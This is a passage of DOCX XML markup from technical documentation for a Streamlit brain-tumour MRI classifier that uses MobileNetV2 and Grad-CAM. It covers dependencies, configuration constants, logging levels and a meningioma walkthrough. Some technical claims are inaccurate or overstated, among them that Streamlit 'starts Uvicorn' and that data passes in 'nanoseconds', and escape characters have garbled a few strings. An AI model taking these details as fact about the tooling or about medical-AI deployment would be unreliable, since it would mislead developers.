              <w:t xml:space="preserve"> │                         │   (Widget state updated)  ├── Re-executes app.py           │</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │                         │                           │                                │</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │                         │                           ├── Check @st.cache_resource ────┤</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │                         │                           │   (Returns cached model)       │</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │                         │                           │                                │</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │                         │                           ├── Preprocess image array       │</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │                         │                           │   (224x224x3, [-1, 1])         │</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │                         │                           │                                │</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │                         │                           ├── compute_gradcam() ──────────&gt;│</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │                         │                           │   Forward pass &amp; Backprop Tape │</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │                         │                           │&lt;── Returns probs &amp; 7x7 heatmap─┤</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │                         │                           │                                │</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │                         │                           ├── OpenCV overlay blending      │</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │                         │                           │   (Resize, Colormap, Alpha)    │</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │                         │                           │                                │</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │                         │&lt;── Stream Render Deltas ──┤                                │</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │&lt;── Sees Diagnosis &amp; ────┤    (Cards, Images, Bars)  │                                │</w:t>
              <w:br/>
              <w:t xml:space="preserve"> │    Glowing Grad-CAM     │                           │                                │</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10.3 Why This Architecture Was Chosen</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Zero Serialization Latency:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Traditional web apps must encode image tensors into base64 strings or write temporary files to disk, transmit them over HTTP, decode them in Flask, and encode the response back into JSON. In Streamlit, tensors are passed directly through Python memory pointers in nanoseconds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Elimination of State Desynchronization:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Because the script runs top-to-bottom on state changes, there are no "stale state" bugs between frontend state and backend databases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Speed of Development:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Allows building a complete, high-performance medical AI prototype in a single, auditable Python module (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>app.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>).</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11: Configuration, Dependencies, and Logging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>11.1 Dependency Specification (`requirements.txt`)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Every library in `d:\Brain_Tumor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>equirements.txt` has a specific technical rationale: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Deep Learning framework and neural network API</w:t>
              <w:br/>
              <w:t>tensorflow&gt;=2.15.0</w:t>
              <w:br/>
              <w:br/>
              <w:t># Numerical computing (pinned below 2.0 for TensorFlow C-API stability)</w:t>
              <w:br/>
              <w:t>numpy&gt;=1.24.0,&lt;2.0.0</w:t>
              <w:br/>
              <w:br/>
              <w:t># Tabular data manipulation and metrics storage</w:t>
              <w:br/>
              <w:t>pandas&gt;=2.0.0</w:t>
              <w:br/>
              <w:br/>
              <w:t># Plotting and image visualization</w:t>
              <w:br/>
              <w:t>matplotlib&gt;=3.7.0</w:t>
              <w:br/>
              <w:br/>
              <w:t># Statistical visualizations (used for heatmaps and confusion matrices)</w:t>
              <w:br/>
              <w:t>seaborn&gt;=0.12.0</w:t>
              <w:br/>
              <w:br/>
              <w:t># Machine learning utilities and classification metrics</w:t>
              <w:br/>
              <w:t>scikit-learn&gt;=1.3.0</w:t>
              <w:br/>
              <w:br/>
              <w:t># Image loading, verification, and resizing</w:t>
              <w:br/>
              <w:t>pillow&gt;=9.5.0</w:t>
              <w:br/>
              <w:br/>
              <w:t># Computer vision processing</w:t>
              <w:br/>
              <w:t>opencv-python&gt;=4.8.0</w:t>
              <w:br/>
              <w:br/>
              <w:t># Jupyter notebook kernel support inside VS Code</w:t>
              <w:br/>
              <w:t>ipykernel&gt;=6.25.0</w:t>
              <w:br/>
              <w:br/>
              <w:t># Web application framework for our interactive UI</w:t>
              <w:br/>
              <w:t>streamlit&gt;=1.30.0</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11.2 Key Configuration Constants &amp; Parameters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Throughout the codebase, specific global constants govern system behavior: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40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Constant Name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Defined In</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Value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Technical Role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What Breaks If Changed?</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`IMG_HEIGHT`, `IMG_WIDTH`</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`app.py`, Notebooks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$224, 224$</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Defines the spatial input dimension required by the MobileNetV2 architecture.</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Altering to $256$ causes a dimension mismatch error in the pre-trained first convolution layer.</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`BATCH_SIZE`</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`02_model_training.ipynb`</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$32$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Number of image tensors processed simultaneously during training step.</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Setting too high (e.g. 256) causes Out-Of-Memory (OOM) CPU crashes.</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`seed`</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`02_model_training.ipynb`</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$42$</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Seed for TensorFlow, NumPy, and Python pseudo-random number generators.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Changing this creates different random train/validation splits, altering reproducibility.</w:t>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`overlay_alpha`</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`app.py`</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$0.45$</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Transparency weight for superimposing the Grad-CAM thermal map onto the MRI.</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If set to $1.0$, the original MRI is hidden; if set to $0.0$, the heatmap disappears.</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`CLASS_NAMES`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`app.py`, Notebooks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`["glioma", "meningioma", "notumor", "pituitary"]`</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Canonical list of class labels in strict alphabetical order (matching Keras directory reader).</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Scrambling the list order assigns model probability outputs to the wrong clinical diagnoses!</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11.3 Logging Levels and Error Handling Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>In our current implementation, user-facing error handling is managed via Streamlit UI guards:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>st.error()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Highlights critical failures (e.g. missing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.keras</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> model file).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>st.warning()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Alerts non-fatal issues (e.g. missing sample folder).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>st.info()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Instructs the user on initial state.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Production Logging Recommendations (For Enterprise Deployment)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">For a hospital-grade production environment, Python's built-in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>logging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> module should be introduced to create immutable audit trails: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20" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Level</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Severity</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Example in NeuroScan AI</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Purpose</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`DEBUG`</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Lowest</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`DEBUG: Image resized from (512, 512) to (224, 224) in 1.2ms`</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Detailed diagnostic information for developers.</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`INFO`</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Routine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`INFO: Model brain_tumor_mobilenetv2_full_scratch.keras loaded successfully`</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Confirms normal system operations and startup milestones.</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`WARNING`</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Non-fatal</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`WARNING: Primary model checkpoint missing; falling back to baseline`</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Flags unexpected conditions that did not halt execution.</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`ERROR`</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Severe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`ERROR: Input image decoding failed: Invalid JPEG byte header`</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Logs a failed operation on a specific patient request.</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`CRITICAL`</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Catastrophic</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`CRITICAL: GPU memory exhausted; process terminating`</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System-wide failure requiring immediate administrative intervention.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pP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12: Complete End-to-End Execution Example</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Let us trace a realistic walkthrough of a user operating the live system:</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12.1 The Concrete Scenario: Diagnosing a Meningioma</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Phase 1: Launching the System</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The developer opens the terminal and executes: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d:\Brain_Tumor\.venv\Scripts\streamlit run app.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Streamlit starts Uvicorn and launches a local server on port </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>8501</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The browser connects to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>http://localhost:8501</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>app.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> runs its first pass:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>@st.cache_resource</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> loads </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>brain_tumor_mobilenetv2_full_scratch.keras</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> into memory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Initial state: no image selected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>UI renders: Header Banner + Blue Info Card: *"Please select a pre-loaded clinical sample or upload an MRI scan from the sidebar to begin analysis."*</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Phase 2: User Selects a Sample Scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">In the sidebar, the user selects: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"🔬 Select Clinical Test Sample"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">From the dropdown, the user picks: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>`Meningioma Tumor (Sample #1)`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Streamlit re-executes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>app.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the new widget state:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>selected_image = Image.open("dataset/Testing/meningioma/Te-me_0010.jpg")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>actual_label = "meningioma"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</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Phase 3: Preprocessing &amp; Neural Computation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>selected_image.convert("RGB")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> converts the image to 3 channels.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cv2.resize(..., (224, 224))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> rescales the image to exact model dimensions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>np.expand_dims(..., 0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> produces tensor of shape </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(1, 224, 224, 3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>compute_gradcam()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> executes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Pixel scaling: $[-1.0, 1.0]$.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Forward pass through MobileNetV2 base: outputs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(1, 7, 7, 1280)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Head forward pass: outputs softmax probabilities:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>$$</w:t>
        <w:tab/>
        <w:t>ext{probs} = [0.0381, 0.9412, 0.0012, 0.0195]$$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Predicted class index: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>pred_idx = 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
